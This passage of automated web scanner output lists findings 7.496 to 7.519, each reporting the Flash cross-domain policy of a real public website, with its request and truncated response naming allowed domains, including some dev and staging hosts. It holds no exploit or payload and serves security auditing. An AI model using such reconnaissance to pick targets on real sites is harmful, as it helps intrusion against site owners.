Content-Type: text/xml
ETag: "161515371"
Accept-Ranges: bytes
Last-Modified: Thu, 12 Aug 2010 12:10:48 GMT
Content-Length: 278
Connection: close
Date: Sat, 02 Apr 2011 14:00:58 GMT
Server: lighttpd/1.5.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.zshare.net"/>
<allow-http-req
...[SNIP]...
7.496. http://www.zwinky.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zwinky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zwinky.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Last-Modified: Fri, 03 Dec 2010 20:55:45 GMT
ETag: "1a9777a-1b5-49687c322009a"
Accept-Ranges: bytes
Content-Length: 437
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*.myfuncards.com" />
   <allow-access-from domain="*.webfetti.com" />
   <allow-access-from domain="*.zwinky.com" />
...[SNIP]...
7.497. http://www.zynga.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zynga.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zynga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 17 Sep 2010 16:52:50 GMT
ETag: "18008ac-130-4907764977c80"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.zynga.com" />
   <allow-access-from domain="*.jobvite.com" />
   <allow-access-from domain="*.fishville.net" />
...[SNIP]...
7.498. http://www.active.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.active.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.active.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 29 Jan 2010 22:51:52 GMT
ETag: "aeeb9a-d9-7b40b200"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:45:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: BIGipServeractive.com_http=3775726090.20480.0000; expires=Sat, 02-Apr-2011 17:45:18 GMT; path=/

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="nike-dev2.ny.rga.com"/>
   <allow-access-from domain="env1-plus.nike.com"/>
   <allow-access-from domain="nikeplus.nike.com"/>
</cro
...[SNIP]...
7.499. http://www.allmenus.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allmenus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allmenus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:09 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 15:23:46 GMT
ETag: "92803e-2a7-47f54bca8c480"
Accept-Ranges: bytes
Content-Length: 679
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.campusfood.com" />
   <allo
...[SNIP]...
<allow-access-from domain="allmenus.com" />
   <allow-access-from domain="campusfood.com" />
   <allow-access-from domain="i-allmenus.com" />
   <allow-access-from domain="intranet.campusfood.com" />
   <allow-access-from domain="post-gazette.com" />
   <allow-access-from domain="www.post-gazette.com" />
   <allow-access-from domain="restaurants.post-gazette.com" />
   <allow-access-from domain="restaurants.philly.com" />
...[SNIP]...
7.500. http://www.autotrader.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.autotrader.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:48 GMT
Server: Apache
Set-Cookie: v1st=29C45FC3ABC999DF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750748369073; path=/; expires=Thu, 12-Mar-15 13:25:48 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 221
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerAT-Production_hhtp=376792586.61475.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="ads.autotrader.com" />
</
...[SNIP]...
7.501. http://www.autotraderstatic.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.autotraderstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:31:40 GMT
Content-Length: 221
Connection: close
Set-Cookie: M7F1=CT; expires=Sat, 30-Apr-2011 13:31:40 GMT; path=/; domain=autotraderstatic.com
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELi OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV;"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="ads.autotrader.com" />
</
...[SNIP]...
7.502. http://www.blackplanet.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackplanet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Content-Length: 257
Keep-Alive: timeout=120, max=470
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="st.bpcdn.us" />
<allow-access-from domain="pi.bpcdn.us" />
...[SNIP]...
7.503. http://www.boston.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:56 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
Accept-Ranges: bytes
Content-Length: 1310
Served-By: garrick
Keep-Alive: timeout=30
Connection: close
Content-Type: application/xml
Set-Cookie: bcpage=0;expires=Sun, 06-Mar-2016 13:42:56 GMT;path=/;domain=boston.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
...[SNIP]...
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...
7.504. http://www.christianbook.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christianbook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.christianbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:12 GMT
Server: Apache/1.3.42 (Unix) mod_perl/1.31
Last-Modified: Fri, 26 Oct 2007 15:22:06 GMT
ETag: "b-146-4722061e"
Accept-Ranges: bytes
Content-Length: 326
Keep-Alive: timeout=120, max=454
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="christianbook.com" />
<allow-a
...[SNIP]...
<allow-access-from domain="graphics.christianbook.com" />
...[SNIP]...
7.505. http://www.chuckecheese.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chuckecheese.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chuckecheese.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 30 Jun 2010 20:09:45 GMT
ETag: "578759-140-ef5b7440"
Accept-Ranges: bytes
Content-Length: 320
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="dev.chuckecheese.com" />
   <allow-access-from domain="chuckecheese.com" />
...[SNIP]...
7.506. http://www.cincinnati.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cincinnati.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cincinnati.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:52 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 06:42:13 GMT
ETag: "1081e3f-33f-46ee1169e1b40"
Accept-Ranges: bytes
Content-Length: 831
Wx: D=1079 t=1301752252167800 w=3
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="submit.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="mx.pointroll.com" />
<allow-access-from domain="geo.pointroll.com" />
<allow-access-from domain="ll.pointroll.com" />
<allow-access-from domain="clk.pointroll.com" />
<allow-access-from domain="clients.pointroll.com" />
<allow-access-from domain="fdaf.pointroll.com" />
<allow-access-from domain="demo.pointroll.net" />
...[SNIP]...
7.507. http://www.continental.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.continental.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.continental.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1800
Content-Length: 1091
Content-Type: text/xml
Last-Modified: Wed, 07 Apr 2010 20:06:07 GMT
Accept-Ranges: bytes
ETag: "51dd6fc28dd6ca1:35ee"
X-Powered-By: ASP.NET
Server: Continental Airlines, Inc.
Date: Sat, 02 Apr 2011 14:15:45 GMT
Connection: close
Set-Cookie: v1st=FAA76B6551E778BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.continental.com

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.uk.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="nhqsinsmktg02" />
...[SNIP]...
7.508. http://www.deadline.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deadline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deadline.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 01 Mar 2011 01:37:40 GMT
ETag: "8ca98e-db-49d61d7844100"
X-Server-Name: 01-www-alice
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:52:44 GMT
Content-Length: 219
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.paramount.com" />
</c
...[SNIP]...
7.509. http://www.deviantart.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deviantart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deviantart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:14 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 05:07:29 GMT
ETag: "1c0003a3-2ba-49e7e67a86640"
Accept-Ranges: bytes
Content-Length: 698
_eep-Alive: timeout=45
_onnection: Keep-Alive
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.deviantart.com" />
<
...[SNIP]...
<allow-access-from domain="st.deviantart.com" />
<allow-access-from domain="staging.deviantart.com" />
...[SNIP]...
7.510. http://www.dreamstime.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dreamstime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dreamstime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:27 GMT
Server: Apache
Last-Modified: Thu, 09 Apr 2009 12:12:12 GMT
ETag: "3f0421-1db-4671e2870bf00"
Accept-Ranges: bytes
Content-Length: 475
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="picfindr.com" />
<allow-access-from domain="www.picfindr.com" />
<allow-access-from domain="spimeo.com" />
<allow-access-from domain="www.spimeo.com" />
...[SNIP]...
<allow-access-from domain="thumbs.dreamstime.com" />
...[SNIP]...
7.511. http://www.elyrics.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elyrics.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Last-Modified: Tue, 21 Sep 2010 16:59:44 GMT
ETag: "1848a61-1c0-490c7f4a22000"
Accept-Ranges: bytes
Content-Length: 448
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM \"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.layoutstar.com" />
<allow-access-from domain="layoutstar.com" />
<allow-access-from domain="srv100.com" />
<allow-access-from domain="www.srv100.com" />
<allow-access-from domain="74.55.225.74" />
<allow-access-from domain="images.elyrics.net" />
...[SNIP]...
7.512. http://www.elyricsworld.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elyricsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
Last-Modified: Thu, 10 Dec 2009 15:47:52 GMT
ETag: "100f8b-8d-47a61bad85a00"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="widget.elyricsworld.com"/>
</cross-domain-policy>
7.513. http://www.epicurious.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epicurious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.epicurious.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 29 Sep 2010 21:34:57 GMT
ETag: "c65b3-161-4916cbb9d8240"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:01 GMT
Content-Length: 353
Connection: close
Cache-Control: max-age=600
Expires: Thu, 31 Mar 2011 19:17:43 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="rsu.feedroom.com" />
<allow-access-from domain="feedroom.com" />
<allow-access-from domain="survey.eqr1.com" />
<allow-access-from domain="ads.pointroll.com" />
...[SNIP]...
7.514. http://www.greatschools.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatschools.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greatschools.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.8e mod_jk/1.2.28
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:18:15 GMT
Keep-Alive: timeout=15, max=991
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jan 2010 23:35:44 GMT
Content-Length: 584
Connection: close

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from d
...[SNIP]...
<allow-access-from domain="greatschools.org" />
...[SNIP]...
<allow-access-from domain="staging.greatschools.org" />
<allow-access-from domain="dev.greatschools.org" />
...[SNIP]...
7.515. http://www.icontact.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icontact.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.icontact.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:52 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.12-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 17 Nov 2010 21:30:01 GMT
ETag: "234-4954660324840"
Accept-Ranges: bytes
Content-Length: 564
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="icontact.com" />
   <allow-access-from domain="icontactplus.com" />
   <allow-access-from domain="plus.icontact.com" />
   <allow-access-from domain="videos.icontact.com" />
...[SNIP]...
7.516. http://www.inbox.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.inbox.com

Response

HTTP/1.1 200 OK
Content-Length: 106
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 12:43:54 GMT
Accept-Ranges: bytes
ETag: "9ea62a4deaeacb1:33ef"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:24 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="" />
</cross-domain-policy>
7.517. http://www.iwon.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.iwon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:47 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 21:52:39 GMT
ETag: "588da-3e8-49fe26db757c0"
Accept-Ranges: bytes
Content-Length: 1000
P3P: policyref="http://c4.iwon.com/w3c/p3p.xml", CP="CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Connection: close
Content-Type: application/xml
Set-Cookie: ltm=2130926090.20480.0000; expires=Sat, 16-Apr-2011 13:31:46 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy>
<allow-access-from domain="i1img.com" />
<allow-access-from domain="ak.imgfarm.com" />
<allow-access-from domain="kc1907.jeeves.ask.info" />
<allow-access-from domain="http://fhhgydaa.joyent.us"/>
<allow-access-from domain="http://fhhgydaa.joyent.us"/>
<allow-access-from domain="http://fhhgydab.joyent.us"/>
<allow-access-from domain="http://fhhgydac.joyent.us"/>
<allow-access-from domain="http://fhhgydad.joyent.us"/>
<allow-access-from domain="http://fhhgydae.joyent.us"/>
<allow-access-from domain="http://fhhgydaf.joyent.us"/>
<allow-access-from domain="http://fhhgydag.joyent.us"/>
<allow-access-from domain="http://fhhgydak.joyent.us"/>
<allow-access-from domain="http://fhhgydal.joyent.us"/>
<allow-access-from domain="http://www.facebook.com"/>
<allow-access-from domain="http://api.facebook.com"/>
...[SNIP]...
7.518. http://www.justluxe.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justluxe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.justluxe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 07 May 2009 06:14:13 GMT
ETag: "13f8306-147-4694c6bbfb740"
Accept-Ranges: bytes
Content-Length: 327
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="www.luxevegas.com" />
<allow-access-from domain="luxevegas.com" />
<allow-access-from domain="dev.luxevegas.com" />
<allow-access-from domain="www.just
...[SNIP]...
<allow-access-from domain="justluxe.com" />
<allow-access-from domain="dev.justluxe.com" />
...[SNIP]...
7.519. http://www.kazaa.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kazaa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kazaa.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
